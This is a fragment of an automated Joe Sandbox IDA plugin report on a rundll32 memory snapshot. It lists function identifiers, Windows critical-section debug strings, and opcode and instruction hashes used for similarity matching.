                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_43c0000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                • API String ID: 885266447-3903918235
                                                                                                • Opcode ID: 6c28659b247a125fc60eacef5b35e5ab6d1fd8f0ed3a1f93887c0675971d62d8
                                                                                                • Instruction ID: c882b6ff7c82a362f7b2060161515aaa4919022744b5d5c623b87ac42646d105
                                                                                                • Opcode Fuzzy Hash: 6c28659b247a125fc60eacef5b35e5ab6d1fd8f0ed3a1f93887c0675971d62d8
                                                                                                • Instruction Fuzzy Hash: F8F0F632200601BFFB201A56ED02F63BB6AEB44730F14031AF6285A5D1EA62F83196F4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%